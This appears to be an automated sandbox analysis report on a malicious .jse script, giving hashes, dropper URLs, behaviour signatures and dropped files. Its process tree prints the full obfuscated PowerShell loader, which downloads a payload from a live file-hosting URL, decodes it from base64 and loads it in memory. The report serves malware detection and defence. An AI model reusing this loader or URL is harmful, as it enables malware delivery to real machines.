Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    27/02/2025, 11:23

General

  • Target

    1092817034_DCTAZ100_2025_23176136_1.jse

  • Size

    309KB

  • MD5

    d97ac5a9ac461d2137606480b79db1c4

  • SHA1

    dda801ef5e48dd7510e7cb8380f316d7a7147265

  • SHA256

    98c41f03c8e8c2b2246014f1cb0a49b2b71afc60c0e83ed33e5ad4e783418703

  • SHA512

    283b076b0ca30bee97e1da8d87460bc6668533608c26370325a0273070bce38165ce2be3eb75662eaa85b6176076fc1fc6f15c2970006d2bc817e714c5735638

  • SSDEEP

    3072:5vJ5HovJ5HovJ5HovJ5H7vJ5HovJ5HovJ5HovJ5H4vJ5HovJ5HovJ5HovJ5HuGnG:L4BL

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3005.filemail.com/api/file/get?filekey=YGeeUqxByC2SUnRwBS5PxBChMdOlgJICDX-dOV3RIbLORoveuNxkFvLqz9DkMXM&skipreg=true&pk_vid=342803d1cc4e3b80174013691680a5ef

exe.dropper

https://3005.filemail.com/api/file/get?filekey=YGeeUqxByC2SUnRwBS5PxBChMdOlgJICDX-dOV3RIbLORoveuNxkFvLqz9DkMXM&skipreg=true&pk_vid=342803d1cc4e3b80174013691680a5ef

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\1092817034_DCTAZ100_2025_23176136_1.jse"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$nahcolite = '#x#.0fc/d1/moc.as.pps//:sp##h';$brandwine = $nahcolite -replace '#', 't';$overripeness = 'https://3005.filemail.com/api/file/get?filekey=YGeeUqxByC2SUnRwBS5PxBChMdOlgJICDX-dOV3RIbLORoveuNxkFvLqz9DkMXM&skipreg=true&pk_vid=342803d1cc4e3b80174013691680a5ef';$oversubscribing = New-Object System.Net.WebClient;$Catapres = $oversubscribing.DownloadData($overripeness);$straped = [System.Text.Encoding]::UTF8.GetString($Catapres);$ribeyes = '<<BASE64_START>>';$alcanna = '<<BASE64_END>>';$incensory = $straped.IndexOf($ribeyes);$flitterchack = $straped.IndexOf($alcanna);$incensory -ge 0 -and $flitterchack -gt $incensory;$incensory += $ribeyes.Length;$smolt = $flitterchack - $incensory;$tenotome = $straped.Substring($incensory, $smolt);$medallion = [System.Convert]::FromBase64String($tenotome);$JITEM = [System.Reflection.Assembly]::Load($medallion);$performic = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($brandwine,'','','','MSBuild','','','','','','','','','',''))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2140

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    71KB

    MD5

    83142242e97b8953c386f988aa694e4a

    SHA1

    833ed12fc15b356136dcdd27c61a50f59c5c7d50

    SHA256

    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

    SHA512

    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

  • C:\Users\Admin\AppData\Local\Temp\Tar4D3D.tmp

    Filesize

    183KB

    MD5

    109cab5505f5e065b63d01361467a83b

    SHA1

    4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

    SHA256

    ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

    SHA512

    753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

  • memory/2140-4-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

  • memory/2140-5-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

  • memory/2140-43-0x000000001D570000-0x000000001D774000-memory.dmp

    Filesize

    2.0MB